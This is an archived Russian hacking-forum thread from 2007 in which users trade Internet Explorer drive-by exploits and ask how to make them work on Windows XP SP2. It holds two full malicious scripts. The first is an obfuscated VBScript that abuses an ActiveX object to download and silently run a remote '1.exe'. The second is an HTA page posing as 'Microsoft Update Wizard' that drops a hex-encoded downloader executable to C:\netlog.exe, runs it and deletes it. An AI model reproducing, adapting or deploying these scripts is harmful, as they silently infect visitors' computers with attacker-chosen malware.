Просмотр полной версии : Вопрос о Эксплоите для Ie
Есть эксплоит : <html>
<body>
<script language="VBScript">
on error resume next
xurl_0="http://САЙТ точка рУ /1.exe"
wbb61f=""
ibb72o="A"
fbb83u="dodb.Stream"
ess01a="Microsoft.XMLH"
uss12h="T"
vss83s="TP"
mcc11h="clsid:BD96C556-65A3-11D0-983A-00C04FC29"
xcc22r="E"
xcc33n="36"
boo71b="Scrip"
doo52e="t"
koo23v="ing.FileSystemObject"
djj61a="obj"
ajj82p="e"
hjj03t="ct"
kcl11r="cla"
mcl42e="s"
lcl63c="sid"
tse41c="Shell.Appli"
bse72h="c"
yse43t="ation"
l5sus0=ess01a&uss12h&vss83s
h3b2bp=wbb61f&ibb72o&fbb83u
c2cac2=mcc11h&xcc22r&xcc33n
j0o2ok=boo71b&doo52e&koo23v
h7jdj8=djj61a&ajj82p&hjj03t
o5l8lo=kcl11r&mcl42e&lcl63c
t0eke8=tse41c&bse72h&yse43t
Set j5d5fa = document.createElement(h7jdj8)
j5d5fa.setAttribute o5l8lo, c2cac2
set x0f5b = j5d5fa.createobject(j0o2ok,"")
set e1x3j = j5d5fa.CreateObject(l5sus0,"")
set h4sm7 = j5d5fa.CreateObject(h3b2bp,"")
set d8qr6 = j5d5fa.CreateObject(t0eke8,"")
set cte2mp = x0f5b.GetSpecialFolder(2)
h4sm7.type = 1
q1get="GET"
e1x3j.Open q1get, xurl_0, False
e1x3j.Send
a5L_xy30= "1.exe"
a5L_xy30= x0f5b.BuildPath(cte2mp,a5L_xy30)
h4sm7.open
h4sm7.write e1x3j.responseBody
h4sm7.savetofile a5L_xy30,2
h4sm7.close
d8qr6.ShellExecute a5L_xy30,"","","open",0
</script>
</body>
</html>
Но непашет у всех. (Под виндой) , нету у кого-то другово скриптика??
если есть оставте в топе.Пасиб
мпак.... ищи на хек порталах...
Termin@L
24.09.2007, 18:36
Я так понял, что он exeшник запускает,
xurl_0="http://САЙТ точка рУ /1.exe" - менял?
P.S. а IE бывает под unix????
есть специальная тема посвещенная эксплоитам под ие дуй сюда
http://forum.antichat.ru/thread24465-exploit.html
а так по чаще посещяй милворн
аффтор. тебе сюда
http://milw0rm.com/
На милворме или плохо искал либо ненашел то что нужно.
>gibson В том топе ненашел ничего хорошего..
>Termin@L Менял менял. мне нужно чтоб под SP2 тож шло.
Вот еще есть на .HTA
<HTML><HEAD><TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><SCRIPT language="VBScript">
self.MoveTo 6000,6000
z=""
a="4"+"D"+"5"+"A"
z=z+(h(a))
z=z+(H("90000300000004000000FFFF0000B800000000000000400000 00000000000000000000000000000000000000000000000000 0000000000000000D80000000E1FBA0E00B409CD21B8014CCD 21546869732070726F6772616D2063616E6E6F7420626520"))
z=z+(H("72756E20696E20444F53206D6F64652E0D0D0A240000000000 000003E9D8DE4788B68D4788B68D4788B68D2597A58D4188B6 8DC494B88D4688B68D4788B78D5088B68D2897B28D4488B68D 13AB878D4688B68D526963684788B68D000000000000000000 00"))
z=z+(H("0000000000000000000000000000504500004C010100E9E004 430000000000000000E0000F010B0106000006000000000000 00000000541200000010000000200000000040000010000000 02000004000000000000000400000000000000002000000002 00"))
z=z+(H("00000000000200000000001000001000000000100000100000 00000000100000000000000000000000281300005000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00"))
z=z+(H("00000000000000000000000000000000000000000000000000 00000000100000540000000000000000000000000000000000 000000000000000000002E746578740000007E040000001000 000006000000020000000000000000000000000000200004E0 00"))
z=z+(H("0000000000000046140000F4130000001400000E1400001A14 0000281400003A14000000000000DE130000D6130000CC1300 00000000000300008010000080130000800400008034000080 09000080170000807300008000000000000000000000000000 00"))
z=z+(H("00000D0A0D0A00000000323030204F4B0000626573742D766F 796575722E696E666F00000000474554202F6D73617263682E 65786520485454502F312E300D0A486F73743A20626573742D 766F796575722E696E666F0D0A0D0A000000006D7361726368 2E"))
z=z+(H("65786500000000000000000000558BECB8CCA20700E8130200 005356578D8558FEFFFF506801010000FF154C10400033DB53 6A016A02FF15481040008BF083FEFF8975FC0F84400100006A 5066C745EC0200FF1544104000FF7508668945EEFF15401040 00"))
z=z+(H("3BC30F841D0100008B400C8B008B008945F06A108D45EC5056 FF153C10400083F8FF0F84FD00000053FF750CFF1504104000 50FF750C56FF1538104000395D100F84D800000053BBA00F00 00538D85345DF8FF50568B35341040008DBD345DF8FFEB1B8B CF"))
z=z+(H("8D95345DF8FF2BCA81F920A107007D0F6A005303F857FF75FC FFD685C07FDF83F8FF0F8498000000FF75FC8027008D85345D F8FF8BF72BF0FF15301040008B3D281040008D85345DF8FF68 6810400050FFD785C059597468686010400050FFD78BF885FF 59"))
z=z+(H("5974586A0068800000006A026A006A0368000000C0FF751083 C704FF15101040008BD883FBFF74336A008D45E8502BF78D84 35345DF8FF505753FF150C10400085C0741753FF1508104000 85C0740C33C040EB0956FF153010400033C05F5E5BC9C3558B EC"))
z=z+(H("81EC58010000568D85A8FEFFFF506804010000FF1500104000 68BC1040008D85A8FEFFFF50FF15181040008D85A8FEFFFF50 68841040006870104000E838FEFFFF83C40C33F683F801753E 6A448D45AC5650E8720000006A108D45F05650C745AC440000 00"))
z=z+(H("E85F00000083C4188D45F0508D45AC505656565656568D85A8 FEFFFF5056FF151410400056FF15241040005ECCCCCCCCCCCC CCCC513D001000008D4C2408721481E9001000002D00100000 85013D0010000073EC2BC88BC485018BE18B088B400450C3CC FF"))
z=z+(H("2520104000CCCC981300000000000000000000E81300002010 00007813000000000000000000005614000000100000A81300 00000000000000000072140000301000000000000000000000 00000000000000000000000046140000F4130000001400000E 14"))
z=z+(H("00001A140000281400003A14000000000000DE130000D61300 00CC1300000000000003000080100000801300008004000080 3400008009000080170000807300008000000000C502737472 7374720000490265786974000099026D656D73657400004D53 56"))
z=z+(H("4352542E646C6C000008036C7374726C656E4100001B00436C 6F736548616E646C6500DF02577269746546696C6500340043 726561746546696C654100440043726561746550726F636573 73410000F9026C737472636174410000650147657454656D70 50"))
z=z+(H("6174684100004B45524E454C33322E646C6C00004144564150 4933322E646C6C00005753325F33322E646C6C000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00"))
z=z+(H("00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00"))
z=z+(H("00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00"))
z=z+(H("00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00"))
z=z+(H("00000000000000000000000000000000000000000000000000 000000"))
FileName="C:\netlog.exe"
set IESetup=MSmedia.CreateTextFile(FileName, TRUE)
IESetup.Write(z)
IESetup.Close()
MSplay.Run (FileName),1,TRUE
MSmedia.DeleteFile(FileName)
self.Close
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
m=1
H2=H2&Chr("&h"&Mid(H1,H3,2))
m=0
Next
H=H2
End Function
</SCRIPT></BODY></HTML>
СОздает в C: нетлог ехе. Скрипт старый но рабочий ток вот немогу нИкаГ раскодировать СиМволы и изменить под себя .
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot